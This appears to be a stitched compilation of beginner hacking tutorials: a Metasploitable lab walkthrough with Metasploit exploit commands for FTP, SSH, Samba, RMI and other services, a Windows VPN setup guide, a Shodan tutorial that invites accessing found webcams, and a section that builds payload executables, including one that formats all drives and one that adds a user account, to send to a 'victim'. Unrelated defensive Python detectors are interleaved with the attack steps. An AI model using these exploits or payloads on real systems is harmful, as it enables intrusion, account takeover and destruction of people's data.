Penetration Testing Skills Practice with Metasploitable (Beginner Guide)

Metasploitable is an intentionally vulnerable version of Ubuntu Linux, packaged as a virtual machine, designed for testing security tools and demonstrating common vulnerabilities. It helps us conduct security training, test security tools, and practice common penetration testing techniques. The VM will run on any recent VMware product and on other virtualization technologies such as VirtualBox. You can download Metasploitable from--> https://www.vulnhub.com/entry/metasploitable-2,29/

Metasploitable is an exploitable platform that helps us improve our skills and teaches us to use every open port to our advantage. As we all know, ports and protocols are the foundation of hacking; therefore, the more of them you understand, the more you can take advantage of the victim.


In this guide we will walk through the whole concept of Metasploitable, including how to install it and how to hack it step by step. We will take the vulnerable ports one by one and try to exploit them. So, first download Metasploitable from the link above. After the download is complete, open VMware and click on Open a virtual machine.


Locate the VMware image of Metasploitable that you just downloaded and click OK.


After clicking OK, Metasploitable will open as a virtual machine. To run it, just click on Power on this virtual machine.


When it starts, it will ask you for a username and password. By default the username and password are msfadmin and msfadmin respectively. Once you enter them, Metasploitable will start.

Now that our vulnerable Linux machine is running, we can type the ifconfig command to retrieve its IP address.


Now, to start penetration testing against Metasploitable, go to the terminal of your Kali Linux and scan the IP of Metasploitable with nmap so that we can see which ports are open. For this, type:
nmap -sV 192.168.1.106


From the nmap output we can see which ports are open and which service is running on each port, so we can start our attack on every vulnerable port one by one. First we will attack vsftpd 2.3.4. We know that this version is vulnerable, so let us exploit it. For this, open Metasploit and type:
search vsftpd 2.3.4


Typing the above command will show the exploits that will help you attack the said version. So further type:

use exploit/unix/ftp/vsftpd_234_backdoor
set rhost 192.168.1.106
set rport 21
exploit

Once your attack is executed, you will land in the shell of Metasploitable, and from there you can do as you wish.
Now we will exploit SSH, which runs on port 22. There is already an existing module for this port. It lets us run a dictionary attack to crack the password of Metasploitable, so we will use it as follows:
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.1.106
set rport 22
set user_file /root/Desktop/user.txt
set pass_file /root/Desktop/pass.txt
exploit


As you can see, after execution the module starts matching every username against the passwords to find the correct pair. In the end you will have the password along with the username.
Now we can use that password to get a shell on Metasploitable. For this, just go to the terminal of Kali and type:
ssh msfadmin@192.168.1.106
Here,
ssh --> is the service through which we are connecting
msfadmin --> is the username (on Metasploitable the password is also msfadmin, as noted above)
192.168.1.106 --> is the victim's IP address


Upon execution you will see that you enter its shell.
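The dictionary attack above is noisy: every guess the ssh_login module makes is written to the target's auth.log by sshd. As an added example (not part of the original guide), here is a small Python detector that reads those lines, counts failed password attempts per source address inside a sliding window, and reports whether a successful login followed the burst from the same source, which is the signature of a cracked credential. The log lines are constructed to resemble OpenSSH messages on a Debian/Ubuntu host and reuse the lab addresses from this guide; the threshold and window values are assumptions to tune per environment.

```python
"""Detect SSH dictionary attacks (like the ones ssh_login produces) in auth.log.

Added example, not part of the original guide. The log lines are constructed to
resemble OpenSSH messages on a Debian/Ubuntu host; the addresses are the lab ones.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: a burst of failures from one source, then a success for msfadmin,
# followed by a single unrelated failure and a normal login from another host.
SAMPLE_AUTH_LOG = """\
May 12 10:01:03 metasploitable sshd[4012]: Failed password for invalid user admin from 192.168.1.105 port 51011 ssh2
May 12 10:01:04 metasploitable sshd[4014]: Failed password for invalid user test from 192.168.1.105 port 51012 ssh2
May 12 10:01:04 metasploitable sshd[4016]: Failed password for msfadmin from 192.168.1.105 port 51013 ssh2
May 12 10:01:05 metasploitable sshd[4018]: Failed password for msfadmin from 192.168.1.105 port 51014 ssh2
May 12 10:01:05 metasploitable sshd[4020]: Failed password for msfadmin from 192.168.1.105 port 51015 ssh2
May 12 10:01:06 metasploitable sshd[4022]: Accepted password for msfadmin from 192.168.1.105 port 51016 ssh2
May 12 10:30:00 metasploitable sshd[4100]: Failed password for msfadmin from 192.168.1.50 port 40001 ssh2
May 12 10:45:00 metasploitable sshd[4101]: Accepted password for msfadmin from 192.168.1.50 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)

def parse_auth_log(text, year=2024):
    """Return (timestamp, result, user, ip) tuples for each sshd password-auth line.

    Syslog lines carry no year, so one is supplied (assumption: same year throughout).
    """
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # cron, sudo and other auth.log noise is ignored
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["ip"]))
    return events

def detect_bruteforce(events, threshold=5, window_seconds=60):
    """Flag source IPs with >= threshold failures inside window_seconds.

    For each flagged source, also list any user whose login was Accepted at or after
    the end of the burst: that is the credential the dictionary attack most likely found.
    """
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev[3]].append(ev)
    findings = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e[0])
        failures = [e for e in evs if e[1] == "Failed"]
        for i in range(len(failures)):  # sliding window over failure timestamps
            j = i
            while j < len(failures) and (failures[j][0] - failures[i][0]).total_seconds() <= window_seconds:
                j += 1
            if j - i >= threshold:
                burst_end = failures[j - 1][0]
                cracked = sorted({e[2] for e in evs if e[1] == "Accepted" and e[0] >= burst_end})
                findings[ip] = {
                    "failures": j - i,
                    "users_tried": sorted({e[2] for e in failures[i:j]}),
                    "success_after_burst": cracked,
                }
                break
    return findings

if __name__ == "__main__":
    for ip, info in detect_bruteforce(parse_auth_log(SAMPLE_AUTH_LOG)).items():
        print(ip, info)
```

The single failure from 192.168.1.50 stays below the threshold, so only the scanning host is reported. On a real host, feed the script `/var/log/auth.log` and pair it with rate limiting (fail2ban or sshd's MaxAuthTries) and key-based authentication, which removes the password guessing surface entirely.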
Now we will try to attack via telnet, which runs on port 23. This port will also let us find the password first and then enter the shell. So, for this type:
use auxiliary/scanner/telnet/telnet_login
set rhosts 192.168.1.106
set rport 23
set user_file /root/Desktop/user.txt
set pass_file /root/Desktop/pass.txt
exploit


Similarly to SSH, it will start a dictionary attack and step by step find the correct password. Now that you have the password you can log on to Metasploitable:

telnet 192.168.1.106
After typing this, it will ask you for the username and password, and once you enter them you will be inside Metasploitable as shown below:


Now we will try to exploit port 80, on which the HTTP service runs. For this too there is a ready-made exploit in Metasploit, and to use it type:

use exploit/multi/http/php_cgi_arg_injection
set rhost 192.168.1.106
set rport 80
exploit


After execution you will get a meterpreter session on Metasploitable as shown.
Next we will try to exploit the Samba service running on port 139. For that we will use the following exploit:

use exploit/multi/samba/usermap_script
set rhost 192.168.1.106
set rport 139
exploit


Running this gives you a shell session, meaning you have reached the shell of Metasploitable.
Now we will use the following exploit against the Java RMI service:
use exploit/multi/misc/java_rmi_server
set rhost 192.168.1.106
set rport 1099
exploit


Again, after you press Enter you will have a meterpreter session.
The next exploit is:
use exploit/linux/postgres/postgres_payload
set rhost 192.168.1.106
set rport 5432
exploit


Once the command is executed you will enter a meterpreter session as shown.
The next exploit relates to UnrealIRCd. To search for it, type:
search Unreal ircd
The results will be the exploits that can help you attack the victim. As you can see, there are three results, and we will use the latest one.


To run the exploit, type:
use exploit/unix/irc/unreal_ircd_3281_backdoor
set rhost 192.168.1.106
set rport 6667
exploit
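Every module in this walkthrough was chosen from the banners that `nmap -sV` returned at the start. As an added example (not part of the original guide), the Python script below does that mapping for a defender: it parses plain-text `nmap -sV` output, matches each open port's service and version against the issues this guide exploits, and prints what the host exposes next to the module that would apply. The scan text is a constructed sample modelled on Metasploitable 2; the rule list and its wording are my own and cover only the services discussed above.

```python
"""Triage an `nmap -sV` report against the services this guide attacks.

Added example, not part of the original guide. The scan output below is a
constructed sample resembling `nmap -sV 192.168.1.106` against Metasploitable 2.
"""
import re

SAMPLE_NMAP = """\
Nmap scan report for 192.168.1.106
Host is up (0.00031s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
1099/tcp open  java-rmi    GNU Classpath grmiregistry
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
6667/tcp open  irc         UnrealIRCd
"""

PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)

def parse_nmap(text):
    """Return one dict per port line of `nmap -sV` output; header/footer lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            rows.append({
                "port": int(m["port"]), "proto": m["proto"], "state": m["state"],
                "service": m["service"], "version": m["version"].strip(),
            })
    return rows

# Each rule: (port or None, regex over "service version" or None, finding, module used in the guide).
KNOWN_ISSUES = [
    (None, re.compile(r"vsftpd 2\.3\.4"), "vsftpd 2.3.4 (backdoored release)", "exploit/unix/ftp/vsftpd_234_backdoor"),
    (None, re.compile(r"\bssh\b", re.I), "SSH password logins exposed to dictionary attacks", "auxiliary/scanner/ssh/ssh_login"),
    (None, re.compile(r"telnet", re.I), "cleartext telnet login exposed", "auxiliary/scanner/telnet/telnet_login"),
    (80, None, "HTTP service (PHP-CGI argument injection in the guide)", "exploit/multi/http/php_cgi_arg_injection"),
    (None, re.compile(r"Samba"), "Samba username map script command execution", "exploit/multi/samba/usermap_script"),
    (None, re.compile(r"java-rmi|grmiregistry"), "Java RMI registry reachable (remote class loading)", "exploit/multi/misc/java_rmi_server"),
    (None, re.compile(r"PostgreSQL"), "PostgreSQL exposed on the network (default credentials in the guide)", "exploit/linux/postgres/postgres_payload"),
    (None, re.compile(r"UnrealIRCd"), "UnrealIRCd (3.2.8.1 release was backdoored)", "exploit/unix/irc/unreal_ircd_3281_backdoor"),
]

def triage(rows):
    """Return [(port, finding, module)] for open ports matching a known issue, sorted by port."""
    findings = []
    for row in rows:
        if row["state"] != "open":
            continue
        text = f'{row["service"]} {row["version"]}'
        for port, pattern, finding, module in KNOWN_ISSUES:
            if port is not None and row["port"] != port:
                continue
            if pattern is not None and not pattern.search(text):
                continue
            findings.append((row["port"], finding, module))
            break  # one finding per port is enough for a triage list
    return sorted(findings)

if __name__ == "__main__":
    for port, finding, module in triage(parse_nmap(SAMPLE_NMAP)):
        print(f"{port:>5}  {finding}  ->  {module}")
```

Port 25 (Postfix) is parsed but not flagged, because nothing in this guide targets it; in a real assessment you would extend KNOWN_ISSUES from a vulnerability database rather than from one tutorial. For the hardening side, the same list reads as a to-do: upgrade or remove vsftpd 2.3.4 and UnrealIRCd, disable telnet in favour of SSH with key authentication, and firewall RMI, Samba and PostgreSQL off any network that does not need them.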



Setup VPN Penetration Testing Lab in Server 2008

You just need to follow the basic steps for configuring a remote access virtual private network (VPN) server using Server Manager, the Add Roles Wizard, and the Routing and Remote Access Server Setup Wizard. After you finish configuring a basic remote access VPN server, you can perform additional configuration tasks on the client, depending on the way you want to use the remote access VPN server.


Start -> Administrative Tools -> Server Manager. Click Add Roles


This wizard helps you install roles on your server. Click Next to continue.


Check the “Network Policy Server” entry under Role Services and click Next.

Network Policy and Access Services provides Network Policy Server (NPS), Routing and Remote Access (RRAS), Health Registration Authority (HRA), and Host Credential Authorization Protocol (HCAP), which help safeguard the health and security of your network.


Read the requirements and click “Next” to continue.


On the following screen, “Select Role Services” for Network Policy and Access Services, place a check mark on Routing and Remote Access Services and make sure “Remote Access Service” and “Routing” are selected as well. Click Next to continue.


To install the selected role services for Network Policy and Access Services, click Install.


This shows the summary confirming that Remote Access Service and Routing were installed successfully. Once the installation finishes, click Close to end the wizard.
Up to here I have completed the installation of the VPN role on the server.


To complete the configuration in Routing and Remote Access, follow these steps.
Start -> Administrative Tools ->Routing and Remote Access


In the console that opens, right click your server name and click “Configure and Enable Routing and Remote Access”. This configures Routing and Remote Access on the selected server.


In the wizard you can enable any of the following combinations of services. I will choose Custom Configuration for my server and click Next.

Next is the Routing and Remote Access Server Setup Wizard, in which I am going to decide which type of access clients should be allowed to the server network.

You can configure the selected services in the Routing and Remote Access console. I am selecting the VPN access check box on this server and clicking Next to continue.

Now you have successfully completed the setup of the VPN access service on your server. To close the wizard, click Finish.


Now you will get a dialog box with the message that the Routing and Remote Access service is ready to use. Click Start Service.


Once the process is finished, and you are back on the main Server Manager window, routing and remote access should now be up and running.


Once Routing and Remote Access has been configured successfully, the administrator selects the desired users and grants them the privilege to access the server through a VPN connection, so that clients can connect from different locations.

Start -> Administrative Tools -> Active Directory Users and Computers -> Right click a user -> Properties


Click on the Dial-In tab and under “Network Access Permission” select Allow Access. Click Apply and OK to finish. Only the selected clients will be able to connect to the server network through the VPN from another network.

This was the first phase of the VPN configuration, performed on the server side by the administrator.


SETUP VPN CONNECTION FOR CLIENT ON WINDOWS 7

Setting up a client connection to a VPN network is very similar to setting up an old-fashioned Dial-Up connection through a phone line. You need to enter a server address (hostname or IP), user and password. Once connected, this system will receive an IP address within the VPN network, so you’ll be able to access it from any other machines also connected to the same VPN network.

Click on the Start -> Control Panel ->Network and Internet -> Network and Sharing Center
To change your network settings, click on the Set up a new connection or network option. This offers different types of network connection options such as broadband, dial-up, VPN, or setting up a router or access point.



Here you can see the other options I mentioned. I will choose Connect to a workplace to set up a dial-up or VPN connection to your workplace. This option sets up the connection from the client to the workplace, or in our case to the server.



Now you will see the next Connect to a Workplace wizard, which asks for the type of connection through which you will connect to your workplace or server.
My option will be Use my Internet connection (VPN), so the connection will be established over the Internet.


Now, to connect, you must know the IP address of the workplace, i.e. the server. 192.168.0.106 is the IP of my Windows Server 2008 R2 with the VPN set up and configured, so I have entered this IP in the Internet address field for the connection.


Earlier I granted the user pentest Allow Access for VPN connections. When you try to connect, it will ask for your credentials for authentication. The client enters his username and password to establish the connection and clicks Connect.


When the given credentials are found to be authorized, the client is allowed to connect to the workplace and is given the VPN connection.

This is a private, secure connection over the Internet between client and server for sharing data through a transparent medium.


To ensure that you have a successful VPN connection, open your command prompt and type ipconfig; this shows another IP address in addition to your LAN one.

My IP is 192.168.0.104 under PPP adapter VPN Connection, which will be used for logging in to the server to access the network and share data, while my LAN IP is 192.168.0.105. This shows that my VPN connection has been established successfully.

Shodan a Search Engine for Hackers (Beginner Tutorial)

Many people have described Shodan as a search engine for hackers, and have even called it "the world's most dangerous search engine". It was developed by John Matherly in 2009, and unlike other search engines, it looks for specific information that can be invaluable to hackers. John Matherly is an Internet cartographer, hence Shodan.

Shodan is a type of search engine that allows users to search for Internet-connected devices and explicit website information such as the type of software running on a particular system and local anonymous FTP servers. Shodan can be used much in the same way as Google, but indexes information based on banner content, which is meta-data that servers send back to hosting clients. For the best results, Shodan searches should be executed using a series of filters in a string format.

So in conclusion we can say that Shodan is a search engine for finding specific devices, and device types, that exist online. It is like an Internet map that lets us see which device is connected to which, which ports are open on a specific device, what operating system a certain system is using, etc. Rather than locating specific content for a particular search term, Shodan is designed to help the user find specific nodes (desktops, servers, routers, switches, etc.) with specific content in their banners.

What can Shodan do?
Shodan pulls service banners from servers and devices on the web, mostly port 80, but also ports 21 (ftp), 22 (SSH), 23 (telnet), 161 (SNMP), and 5060 (SIP). Since almost every new device now has a web interface (maybe even your refrigerator) to ease remote management, we can access innumerable web-enabled servers, network devices, home security systems, etc. Shodan can find us webcams, traffic signals, video projectors, routers, home heating systems, and SCADA systems that, for instance, control nuclear power plants and electrical grids. If it has a web interface, Shodan can find it! Although many of these systems communicate over port 80 using HTTP, many use telnet or other protocols over other ports. Keep that in mind when trying to connect to them.

How to use Shodan?

Understanding Shodan is very important. At first you might find it complex, but once you get to know it you will find it very handy to use and very resourceful too. So, now let us learn how to work with this fascinating search engine. To use Shodan to your advantage, you first have to register.


Follow the steps to register. After registration, an activation link will be sent to your e-mail address. Once your account is activated, log in to Shodan; now that you are logged in, you are free to search for anything.
Here are some examples of what you can use Shodan to search for.
Webcam
When you search for webcam, it will show you all the webcams present in the world. It will show the results as in the image below:


Traffic Signals
Searching for traffic signals or traffic signal cameras will show you all the traffic surveillance cameras present.


Cisco
Searching for cisco will show you all the Cisco routers in the world, but you can also filter them by country. Here, for example, I have found Cisco routers in India; the result is in the image below:


Scada
You can also search for Scada and you will get information about SCADA systems around the whole world, as shown:


netcam
Shodan can also show you all the netcams in the world, and you can access them too with your hacking skills.


GPS
Shodan even lets you find all the GPS devices all over the world and for this you just have to type gps in the search box.


Port
Not only devices: it can also help find which port is open on which device. For example, here I have searched for port:1723. We all know this port is used for VPN, so through this we can learn which devices are running a VPN, as shown in the image below:


When you search for port:3389 it will also show the operating system used by the device, which can be very useful.
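The same index that lets an attacker search for port:1723 or port:3389 across the world lets a defender ask a narrower question: which of my own addresses does Shodan see, and on which ports? Shodan lets you download results as JSON lines (one banner per line). As an added example (not part of the original tutorial), the Python script below reads such an export, keeps only banners inside your own address ranges, and summarises the exposed ports per host, marking the ones this tutorial searched for (telnet, PPTP VPN, RDP) as risky. The banner records, the 203.0.113.0/24 range and the risky-port list are constructed sample data and assumptions; the field names (ip_str, port, os, location) follow Shodan's export format.

```python
"""Check your own address space against a Shodan JSON-lines export.

Added example, not part of the original tutorial. The banners and the address
range below are constructed sample data (documentation ranges, not real hosts).
"""
import ipaddress
import json

# Constructed banners in the shape of a Shodan export, trimmed to the fields used here.
SAMPLE_EXPORT = """\
{"ip_str": "203.0.113.10", "port": 80, "transport": "tcp", "product": "Apache httpd", "os": null, "location": {"country_code": "IN"}}
{"ip_str": "203.0.113.10", "port": 23, "transport": "tcp", "product": null, "os": null, "location": {"country_code": "IN"}}
{"ip_str": "203.0.113.25", "port": 3389, "transport": "tcp", "product": "Remote Desktop Protocol", "os": "Windows 7", "location": {"country_code": "IN"}}
{"ip_str": "203.0.113.25", "port": 1723, "transport": "tcp", "product": "MS PPTP", "os": "Windows 7", "location": {"country_code": "IN"}}
{"ip_str": "198.51.100.7", "port": 1723, "transport": "tcp", "product": "MS PPTP", "os": null, "location": {"country_code": "US"}}
"""

# Assumed policy: ports whose exposure to the whole Internet should be reviewed.
RISKY_PORTS = {23: "telnet (cleartext)", 1723: "PPTP VPN", 3389: "RDP"}

def load_banners(text):
    """Parse a JSON-lines export into dicts, skipping blank or malformed lines."""
    banners = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            banners.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # a truncated download should not abort the whole report
    return banners

def exposure_report(banners, own_networks, risky_ports=RISKY_PORTS):
    """Map each own-network IP seen by Shodan to its ports, OS guess and risky-port notes."""
    nets = [ipaddress.ip_network(n) for n in own_networks]
    report = {}
    for b in banners:
        ip = ipaddress.ip_address(b["ip_str"])
        if not any(ip in net for net in nets):
            continue  # somebody else's address space
        entry = report.setdefault(b["ip_str"], {"ports": set(), "os": None, "risky": {}})
        entry["ports"].add(b["port"])
        if b.get("os"):
            entry["os"] = b["os"]
        if b["port"] in risky_ports:
            entry["risky"][b["port"]] = risky_ports[b["port"]]
    for entry in report.values():
        entry["ports"] = sorted(entry["ports"])
    return report

if __name__ == "__main__":
    for ip, entry in exposure_report(load_banners(SAMPLE_EXPORT), ["203.0.113.0/24"]).items():
        print(ip, entry)
```

The host in 198.51.100.0/24 is dropped because it is outside the ranges given, while 203.0.113.10 is reported with telnet open and 203.0.113.25 with both RDP and PPTP, plus the operating-system guess Shodan attached to the banner. Running this on a schedule against a fresh export is a cheap way to notice when a device with a web or telnet interface appears on your perimeter before somebody else finds it.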

This is how Shodan is useful for hackers: it gathers all the information necessary, from all over the world, and you can use this information as you wish.

Fun with Metasploit Payloads

Ordinarily small things seem to have no use, but when it comes to their greater relevance they can, at a certain point, have a universal impact and create a complex situation. This article is about some simple payloads that can help us mess with our victim and leave a mark behind.
Moreover, Metasploit is not only about hacking but about hacking in style. There are a lot of payloads that are too good not to use. These payloads are like small droplets in an ocean, but they still matter, and only a handful of people know about them. So far we have only learnt about hardcore Metasploit, so let us see what more cool things it has to show us.

Add User
Moving forward, let us learn how to make such payloads. Open Metasploit and use the windows/adduser payload. This payload creates another user on your victim's PC. The commands are:

use windows/adduser
set user raaz
set pass Ignite@123
set wmic true

generate -t exe -f /root/Desktop/user.exe


With the execution of the above commands, a new user will be created on your victim's PC. You can go to the shell of your victim's PC and see the result. To list the users, type:
net user
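From the defender's side, the account this payload creates is exactly the kind of change a host baseline should catch. As an added example (not part of the original article), here is a Python check that parses the output of `net user`, diffs it against the list of accounts that are supposed to exist, and reports anything new. The `net user` text, the host name VICTIM-PC and the baseline set are constructed sample data; the account name raaz is the one used in the payload above.

```python
"""Spot local accounts that were not there before, e.g. one dropped by windows/adduser.

Added example, not part of the original article. The `net user` output and the
baseline below are constructed sample data.
"""

# Constructed sample of `net user` output on a host where the payload above has run.
SAMPLE_NET_USER = r"""
User accounts for \\VICTIM-PC

-------------------------------------------------------------------------------
Administrator            Guest                    raaz
The command completed successfully.
"""

# Hypothetical baseline: the accounts that are supposed to exist on this host.
BASELINE_ACCOUNTS = {"Administrator", "Guest"}

def parse_net_user(text):
    """Return the account names listed by `net user` (columns are whitespace separated)."""
    accounts = []
    in_table = False
    for line in text.splitlines():
        if line.startswith("----"):
            in_table = True  # names start after the separator line
            continue
        if not in_table:
            continue
        if not line.strip() or line.startswith("The command completed"):
            break
        accounts.extend(line.split())
    return accounts

def new_accounts(text, baseline=BASELINE_ACCOUNTS):
    """Accounts present in the `net user` output but absent from the baseline."""
    return sorted(set(parse_net_user(text)) - set(baseline))

if __name__ == "__main__":
    print("unexpected accounts:", new_accounts(SAMPLE_NET_USER))
```

Two practical notes. `net user` prints names in fixed-width columns, so an account name containing a space would be split in two by this parser; where PowerShell is available, Get-LocalUser gives unambiguous names. And the same account creation is written to the Windows Security log as event ID 4720 (a user account was created), which is the event to forward and alert on rather than polling `net user`.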


Message Box

Another payload is windows/messagebox. This payload makes a pop-up message appear on the victim's PC. The message can be anything you want, along with a title. To create this payload, again open Metasploit and use windows/messagebox. The commands are:
use windows/messagebox
set text you have been hacked
set title Important Message
generate -t exe -f /root/Desktop/message.exe


And your payload is created. When you send it and the victim opens it, a pop-up message box will appear displaying your message, like the following one:


Format Drives
Our next payload is windows/format_all_drives. This payload formats any desired drive. The commands to create this payload are:

use windows/format_all_drives
set volumelabel 3
generate -t exe -f /root/Desktop/format.exe


When the payload is sent and opened, it formats their drives.
Speak
Another such payload is windows/speak_pwned. This is a one-liner payload that plays an audio message saying "you have been pwned" when the victim opens it. Its commands are:
use windows/speak_pwned
generate -t exe -f /root/Desktop/speak.exe


So that is how you can use different payloads to mess with your victim. You can also create these payloads and keep them with you so that you can use them whenever you want. And please note that all these payloads are post-exploitation payloads; to make them work you first need to hack your victim.

This way even the smaller things will make a difference; after all even a pawn can kill the king. And most importantly, once you are done with your victim you can leave him/her a souvenir.